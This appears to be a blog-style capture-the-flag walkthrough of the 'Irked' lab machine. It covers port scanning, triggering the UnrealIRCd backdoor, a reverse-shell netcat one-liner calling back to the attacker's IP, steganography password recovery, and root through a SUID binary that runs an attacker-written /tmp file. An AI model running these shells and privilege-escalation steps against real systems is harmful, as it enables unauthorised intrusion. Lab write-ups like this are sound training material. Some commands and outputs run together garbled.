Irked
Reconnaissance: NMAP
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.117
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 52645/tcp6 status
| 100024 1 53154/udp status
| 100024 1 53543/udp6 status
|_ 100024 1 60050/tcp status
Aggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.16 (96%), Linux 3.18 (96%), Linux 3.2 - 4.9 (96%), Linux 3.8 - 3.11 (96%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.117
111/udp open rpcbind
631/udp open|filtered ipp
1900/udp open|filtered upnp
5353/udp open zeroconf┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.117
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 52645/tcp6 status
| 100024 1 53154/udp status
| 100024 1 53543/udp6 status
|_ 100024 1 60050/tcp status
6697/tcp open ircs-u?
|_irc-info: Unable to open connection
8067/tcp open infi-async?
|_irc-info: Unable to open connection
60050/tcp open status 1 (RPC #100024)
65534/tcp open unknownWe get back the following result showing that nine ports are open:
Port 22: running OpenSSH 6.7p1
Port 80: running Apache httpd 2.4.10
Port 111: running rpcbind 2–4
Ports 6697, 8067 & 65534: running UnrealIRCd
Port 51881: running an RPC service
Port 111: running rpcbind
Port 5353: running zeroconf
Enumeration: HTTP Port 80/tcp
Let’s start with enumerating port 80. Visit the machine’s IP address in the browser. We get back the following page.
Let’s view the page source (right click > View Page Source) to see if that gives us any extra information.
view-source:http://10.10.10.117/
Gobuster:
┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.117
/manual (Status: 301) [Size: 313] [--> http://10.10.10.117/manual/]The /manual directory leads us to the default Apache HTTP server page.
http://10.10.10.117/manual/en/index.html Version 2.4
Enumeration: UnrealIRCd Ports 6697, 8067 & 65534
Another dead end. Let’s move on to other ports. Ports 22 and 111 running OpenSSH 6.7p1 and rpcbind 2–4 don’t look promising. Ports 6697, 8067 & 65534 are running UnrealIRCd. A version of this service was vulnerable to a backdoor command execution. Let’s see if there are any nmap scripts that check for this vulnerability.
┌──(kali💀kali)-[~]
└─$ ls -la /usr/share/nmap/scripts/irc-
Completing file
irc-botnet-channels.nse irc-info.nse irc-unrealircd-backdoor.nse
irc-brute.nse irc-sasl-brute.nse Documentation tells us that not only can nmap detect it, but it can also be used to start a netcat listener that would give us a shell on the system. First, run an nmap scan to see which of these ports are vulnerable to the backdoor.
┌──(kali💀kali)-[~]
└─$ nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117
6697/tcp open ircs-u
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8067/tcp open infi-async
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
65534/tcp open unknown
Port 8067 is vulnerable! Shell as ircd
The next obvious step would be to get a reverse shell on the machine by exploiting the UnrealIRCd backdoor vulnerability. After attempting to do that, I spent an hour trying to figure out why neither my netcat reverse or bind shells are not working. It turns out that if you add the flag “-n” which stands for “do not do any DNS or service lookups on any specified address”, the shell doesn’t work. I’m not sure why. I’ll update this blog when I figure it out.
OPTION 1:
For now, set up a listener on the attack machine.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 4444
nc -lnvp 443Send a reverse shell to our listener from the target machine.
┌──(kali💀kali)-[~]
└─$ nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.16.4 4444" 10.10.10.117Let’s upgrade it to a better shell.
python -c 'import pty; pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$
ircd@irked:~/Unreal3.2$ whoami
ircd
ircd@irked:~/Unreal3.2$ id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.
stty raw -echoOnce that is done, run the command “fg” to bring netcat back to the foreground.
OPTION 2:
Based on what I found during reconnaissance, I think I can just connect with nc and enter AB; [some command] and get it to run. I’ll test with a ping. I have tcpdump running listening for icmp. Now I’ll connect, and test out my theory:
┌──(kali💀kali)-[~]
└─$ nc 10.10.10.117 6697In my other window:
┌──(kali💀kali)-[~]
└─$ sudo tcpdump -ni tun0 icmp Shell:
Now I can use this to get a shell:
AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.4 443 >/tmp/f┌──(kali💀kali)-[~]
└─$ nc -lnvp 443 Privesc: ircd –> djmardov
Let’s see if we have enough privileges to get the user.txt flag.
ircd@irked:~/Unreal3.2$ locate user.txt
/home/djmardov/user.txt
/home/djmardov/Documents/user.txt
/usr/share/doc/fontconfig/fontconfig-user.txt.gzWe don’t. We need to escalate privileges. In that same directory, there’s a hidden .backup file:
ircd@irked:/home/djmardov/Documents$ ls -la
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSssSteg:
With the reference to steg, I immediately think of the big image on the website. I’ll download a copy:
┌──(kali💀kali)-[~/Desktop]
└─$ wget 10.10.10.117/irked.jpg
Now I’ll try steghide, a command steg tool, with the follow arguments:
extract - I want to extract data
-sf irked.jpg - give the file to extract from
-p - passphrase
┌──(kali💀kali)-[~/Desktop]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
┌──(kali💀kali)-[~/Desktop]
└─$ cat pass.txt
Kab6h+m+bbp2J:HGSU: That password works as djmardov’s password with su:
ircd@irked:~/Unreal3.2$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/home/ircd/Unreal3.2$ SSH: I can also ssh in:
ircd@irked:~/Unreal3.2$ ssh djmardov@10.10.10.117
djmardov@irked:~$ cat user.txt
cat user.txt
a0a8e------------------------------- Privesc: djmardov –> root
Let’s transfer the LinEnum script from our attack machine to the target machine.
In the attack machine, start up a server in the same directory that the script resides in.
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ python -m SimpleHTTPServer 5555 In the target machine download the LinEnum script.
djmardov@irked:~$ cd /tmp
djmardov@irked:/tmp$ wget http://10.10.16.4:5555/LinEnum.shGive it execute privileges.
djmardov@irked:/tmp$ chmod +x LinEnum.sh
djmardov@irked:/tmp$ ./LinEnum.shviewuser
After sifting through all the output from the script, we notice the following file which has the SUID bit set.
[-] SUID files:
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuserLet’s try and execute the file to see what it outputs.
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)It seems to be running a file /tmp/listusers, however, the file does not exist. Since the SUID bit is set for this file, it will execute with the level of privilege that matches the user who owns the file. In this case, the file is owned by root, so the file will execute with root privileges. It’s in the /tmp directory, which we have access to, so let’s create the file and have it run a bash shell.
djmardov@irked:/tmp$ echo "bash" > /tmp/listusers
chmod +x /tmp/listusers
djmardov@irked:/dev/shm$ echo id > /tmp/listusers djmardov@irked:/dev/shm$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)djmardov@irked:/dev/shm$ echo sh > /tmp/listusers djmardov@irked:/dev/shm$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
root@irked:/dev/shm#
root@irked:/dev/shm# cat /root/root.txt
cat /root/root.txt
a4da2------------------------------Last updated